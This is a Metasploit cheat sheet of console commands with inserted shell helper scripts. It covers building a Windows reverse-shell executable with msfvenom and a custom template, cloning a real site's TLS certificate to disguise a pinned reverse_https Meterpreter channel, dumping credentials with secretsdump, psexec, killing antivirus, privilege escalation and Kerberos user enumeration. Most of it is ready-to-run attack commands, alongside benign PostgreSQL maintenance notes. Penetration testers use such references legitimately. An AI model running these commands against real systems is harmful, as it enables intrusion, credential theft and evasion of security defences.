Metasploit - Cheat Sheet


Core

Jobs

#List Jobs
jobs -l
#Kill all Jobs
jobs -K
#Kill single Job by ID
jobs -k 1

Module

#switch between modules; pushm/popm keep a stack of previously used modules
use exploit/multi/handler
#push the current module onto the stack
pushm
use post/multi/recon/local_exploit_suggester
set session 1
pushm
use scanner/smb/smb_login
#list the stack
listm
[*] Module stack:

[1]     post/multi/recon/local_exploit_suggester
[0]     exploit/multi/handler
#return to the module on top of the stack and remove it from the stack
popm

RHOSTS ip address list

set RHOSTS file:/home/user/iplist.txt

Run (background job)

use exploit/multi/handler
#-p selects the payload, -j runs the handler as a background job (see jobs -l)
run -p windows/shell/reverse_tcp lhost=0.0.0.0 lport=443 -j

Sessions

#List sessions
sessions
#Interact with session 1
sessions -i 1

Search

msf6 > search platform:windows port:135 target:XP type:exploit
#list available keywords
msf6 > help search

Custom

Custom Templates

The framework ships the source of a PE template that msfvenom can use (-x) once it has been assembled:

metasploit-framework/data/templates/src/pe/exe/template_x64_windows.asm

Enlarge the buffer reserved for the payload if the payload does not fit (change 4096 to 8192), assemble the template with ml64, then pass the resulting executable to msfvenom (-x takes the compiled .exe, not the .asm):

C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.38.33130\bin\Hostx64\x64>ml64.exe c:\tmp\template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files (x86)\Windows Kits\10\Lib\10.0.22621.0\um\x64\kernel32.Lib" /entry:main
msfvenom -x template_x64_windows.exe -p windows/x64/shell_reverse_tcp LHOST=0.0.0.0 LPORT=4500 -f exe > file.exe

Custom SSL

Run auxiliary/gather/impersonate_ssl against the site whose certificate should be cloned (see SSL under Auxiliary) and point the handler at the PEM it saves to loot. Both options belong to the reverse_https payloads: HandlerSSLCert is the certificate the listener presents, StagerVerifySSLCert makes the stager accept only a listener presenting that certificate, so the payload must be generated with the same cert and option.

set HandlerSSLCert /home/path/cert.pem
set StagerVerifySSLCert true
run

Database

Initialise the database once with msfdb init. It creates the PostgreSQL role and database, loads the schema and writes the connection settings to database.yml, after which msfconsole connects on startup; db_connect is only needed for a database that was set up by hand.

msf6 > db_connect user:pass@localhost/msf
msf6 > db_status
msf6 > workspace
msf6 > workspace -a new_ws
#ping sweep into the hosts table (-sn; -sP is the deprecated spelling)
msf6 > db_nmap -sn 192.168.2.0/24
msf6 > hosts
msf6 > use auxiliary/scanner/portscan/tcp
#set RHOSTS from the hosts table of the current workspace
msf6 auxiliary(scanner/portscan/tcp) > hosts -R
msf6 auxiliary(scanner/portscan/tcp) > run
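Added example, not part of the page or of the Metasploit project: a small shell helper that writes a resource script driving a scan from the workspace database instead of from a hand-typed RHOSTS. It goes one step beyond the commands above by narrowing RHOSTS with `services -p <port> -R` before a protocol-specific module. It assumes msfdb init has already been run (so msfconsole connects on its own); the workspace name, subnet, port list and output path are parameters chosen here.

```shell
#!/usr/bin/env bash
# Added example (not from the page or from Metasploit): generate a resource
# script that populates the workspace database and then targets from it.
# Assumes msfdb init has been run; WORKSPACE, SUBNET and OUT are parameters.
set -eu

# Writes the resource script to OUT.
#   1. db_nmap -sn fills the hosts table (ping sweep only)
#   2. hosts -R turns every host in the table into RHOSTS for the port scanner
#   3. services -p 445 -u -R turns only hosts with an open 445 into RHOSTS
#      for the SMB module, so unrelated hosts are never touched
write_db_recon_rc() {
  workspace="$1"; subnet="$2"; out="$3"
  cat > "$out" <<EOF
workspace -a $workspace
db_nmap -sn $subnet
use auxiliary/scanner/portscan/tcp
set PORTS 22,139,445,3389,5985
hosts -R
run
use auxiliary/scanner/smb/smb_version
services -p 445 -u -R
run
services -u
EOF
}

# Usage on an attacker box (not executed here):
#   write_db_recon_rc lab 192.168.2.0/24 recon.rc && msfconsole -q -r recon.rc
```

The `-u` flag keeps only services recorded as up, so a host whose 445 was seen closed by the port scanner is excluded from the SMB run.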

Metasploit with PostgreSQL

Collation version mismatch (ALTER DATABASE ... REFRESH COLLATION VERSION)

PostgreSQL warns about a collation version mismatch after the system libc/ICU was upgraded. Refresh the recorded version for every affected database:

sudo -u postgres psql
\l
ALTER DATABASE <dbnames> REFRESH COLLATION VERSION;
\q
service postgresql restart

Password reset for user msf

When the password stored in database.yml no longer matches the PostgreSQL role, either set a new password on the role or let msfdb rebuild everything:

sudo -u postgres psql
\password msf
Enter new password for user "msf": 
Enter it again: 
\q
#reinit drops and recreates the msf database and writes a fresh database.yml (existing workspace data is lost)
msfdb reinit

Port problems with PostgreSQL 15 and 16 installed

After a distribution upgrade the new cluster (16) is created on the next free port, 5433, while msfdb still expects 5432. Swap the ports of the two clusters (5422 is only a scratch value while editing; nothing listens on it), restart PostgreSQL and re-initialise:

sudo nano /etc/postgresql/16/main/postgresql.conf
#find "port = 5433" and change it to "port = 5422"
sudo nano /etc/postgresql/15/main/postgresql.conf
#find "port = 5432" and change it to "port = 5433"
sudo nano /etc/postgresql/16/main/postgresql.conf
#find "port = 5422" and change it to "port = 5432"
sudo systemctl restart postgresql
msfdb reinit
msfdb status
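Added example, not part of the page or of msfdb: the same port swap done with sed instead of three nano sessions, with a check that the file actually has an active port line before anything is rewritten. Since the config files are only read at restart, the two clusters can be edited directly without the intermediate 5422. It assumes the Debian/Kali layout /etc/postgresql/<version>/main/postgresql.conf, but the paths are passed in explicitly so it can be tried on copies first.

```shell
#!/usr/bin/env bash
# Added example (not from the page or from msfdb): swap the ports of two
# PostgreSQL clusters so the newer one ends up on 5432, the port msfdb expects.
# Paths are parameters; the Debian layout is only an assumption for the usage line.
set -eu

# Print the active "port = N" value of a postgresql.conf (commented lines ignored).
pg_conf_port() {
  sed -n 's/^[[:space:]]*port[[:space:]]*=[[:space:]]*\([0-9]*\).*/\1/p' "$1" | head -n 1
}

# Rewrite the active port line in place (a .bak copy is kept).
# Fails instead of silently doing nothing when the file has no active port line.
pg_conf_set_port() {
  conf="$1"; port="$2"
  grep -Eq '^[[:space:]]*port[[:space:]]*=' "$conf" || return 1
  sed -i.bak -E "s/^([[:space:]]*port[[:space:]]*=[[:space:]]*)[0-9]+/\1${port}/" "$conf"
}

# Exchange the ports of the old and the new cluster. No scratch port is needed:
# the files are edited before the server is restarted, so no port is claimed twice.
pg_swap_ports() {
  old_conf="$1"; new_conf="$2"
  old_port=$(pg_conf_port "$old_conf")
  new_port=$(pg_conf_port "$new_conf")
  [ -n "$old_port" ] && [ -n "$new_port" ] || return 1
  pg_conf_set_port "$old_conf" "$new_port"
  pg_conf_set_port "$new_conf" "$old_port"
}

# Usage on a real box (not executed here), then restart and re-initialise:
#   pg_swap_ports /etc/postgresql/15/main/postgresql.conf /etc/postgresql/16/main/postgresql.conf
#   sudo systemctl restart postgresql && msfdb reinit && msfdb status
```

Run `pg_conf_port` on both files after the restart to confirm which cluster now owns 5432 before calling msfdb reinit, since reinit drops the msf database on whatever cluster it reaches there.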

Meterpreter

Modules

List loadable extensions

load -l

Scripts

Reference

meterpreter > run <scriptname>

Script              Action
------              ------
checkvm             check if the target system is a VM
getcountermeasure   check security settings
getgui              try to enable RDP
get_local_subnets   list local subnets
gettelnet           enable telnet
hostsedit           edit the hosts file
killav              try to kill antivirus processes
remotewinenum       enumerate system information
scraper             enumerate more system information
winenum             detailed Windows enumeration

These are legacy Meterpreter scripts; most have post module replacements (for example post/windows/gather/checkvm, post/windows/manage/enable_rdp, post/windows/manage/killav), which should be preferred where available.

Modules

Auxiliary

Kerberos User Enumeration

use auxiliary/gather/kerberos_enumusers
set rhosts $ip
#DOMAIN is required: the realm the KDC answers for
set DOMAIN domain.local
set threads 10
set USER_FILE /path/to/list.txt
run
#valid usernames are stored in the database
creds

SSL

impersonate_ssl
use auxiliary/gather/impersonate_ssl
set RHOSTS www.google.com
set ADD_CN true
set ADD_SAN true
run
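Added example, not part of the page or of the Metasploit project, covering both this module and the Custom SSL section above: once impersonate_ssl has saved the cloned certificate, the handler must serve that PEM and the stager must be generated against the same file so that StagerVerifySSLCert (which compiles the certificate hash into the stager) matches what the listener presents. The helper also checks that the PEM carries both a certificate and a private key, since the handler cannot terminate TLS without the key. The cert path, LHOST and LPORT are placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the page or from Metasploit): build a certificate-pinned
# reverse_https handler plus the matching msfvenom command.
# Assumptions: CERT is the PEM (certificate + private key) saved by
# auxiliary/gather/impersonate_ssl; LHOST/LPORT/output paths are placeholders.
set -eu

# The handler needs both the certificate and its private key in one PEM.
# Returns 1 if either block is missing.
check_handler_pem() {
  pem="$1"
  grep -q -- '-----BEGIN CERTIFICATE-----' "$pem" || return 1
  grep -Eq -- '-----BEGIN (RSA |EC )?PRIVATE KEY-----' "$pem" || return 1
}

# Write the handler resource script. ExitOnSession false keeps the listener
# up after the first callback; -j runs it as a background job.
write_pinned_handler_rc() {
  cert="$1"; lhost="$2"; lport="$3"; out="$4"
  check_handler_pem "$cert"
  cat > "$out" <<EOF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST $lhost
set LPORT $lport
set HandlerSSLCert $cert
set StagerVerifySSLCert true
set ExitOnSession false
run -j
EOF
}

# Print the matching msfvenom command. The same HandlerSSLCert must be given
# here, because the stager pins the hash of exactly that certificate.
pinned_stager_cmd() {
  cert="$1"; lhost="$2"; lport="$3"; outfile="$4"
  printf 'msfvenom -p windows/x64/meterpreter/reverse_https LHOST=%s LPORT=%s HandlerSSLCert=%s StagerVerifySSLCert=true -f exe -o %s\n' \
    "$lhost" "$lport" "$cert" "$outfile"
}

# Usage on an attacker box (not executed here; paths are placeholders):
#   write_pinned_handler_rc ~/.msf4/loot/cloned.pem 10.0.0.5 443 handler.rc
#   msfconsole -q -r handler.rc
#   $(pinned_stager_cmd ~/.msf4/loot/cloned.pem 10.0.0.5 443 payload.exe)
```

If the certificate is later regenerated, every stager built against the old PEM stops connecting, which is the intended effect of the pin: rebuild the payload rather than disabling StagerVerifySSLCert.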

SMB

Impacket Secretsdump

use scanner/smb/impacket/secretsdump
set RHOSTS 192.168.1.1
set SMBDOMAIN domain
set SMBUSER user
set SMBPASS pass
run

SMB Login

#CreateSession=true (Metasploit 6.4 and later) opens an SMB session for every valid login
use scanner/smb/smb_login
run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
sessions -i 1

WinRM

WinRM Login

#winrm_login takes USERNAME, PASSWORD and DOMAIN (not the SMB* option names); RPORT defaults to 5985
use scanner/winrm/winrm_login
run CreateSession=true RHOSTS=172.14.2.164 DOMAIN=windomain.local PASSWORD=password USERNAME=username

Post

SMB PsExec

use exploit/windows/smb/psexec
set rhost 127.0.0.1
set smbuser mega-admin
set smbpass p4ss
run

Local Exploit Suggester

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Upgrade Shell to Meterpreter

use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

Privilege Escalation

Service

#looks for services whose binary or configuration the session's user can modify and hijacks one to get SYSTEM
use exploit/windows/local/service_permissions
set SESSION 1
run lhost=0.0.0.0 lport=12222

UAC / Privilege Enumeration

#reports whether the session is admin or SYSTEM, its privileges and whether UAC is enabled
use post/windows/gather/win_privs
set SESSION 1
run

Plugins

Alias

load alias
alias s set
alias sg setg

Aliases

Alias   Command
-----   -------
sr      search
s       set
sg      setg
r       run
u       use
o       options
a       alias
adv     advanced
rc      resource

Put the load alias line and the alias definitions into ~/.msf4/msfconsole.rc to have them available at every start.

wiki

load wiki
Wiki Commands
=============
    Command           Description
    -------           -----------
    dokuwiki          Outputs data from the current workspace in dokuwiki markup.
    mediawiki         Outputs data from the current workspace in mediawiki markup.

wmap

load wmap
wmap_sites -a http://vict.im
wmap_targets -d 0
wmap_run -t
wmap_run -e
wmap_vulns -l
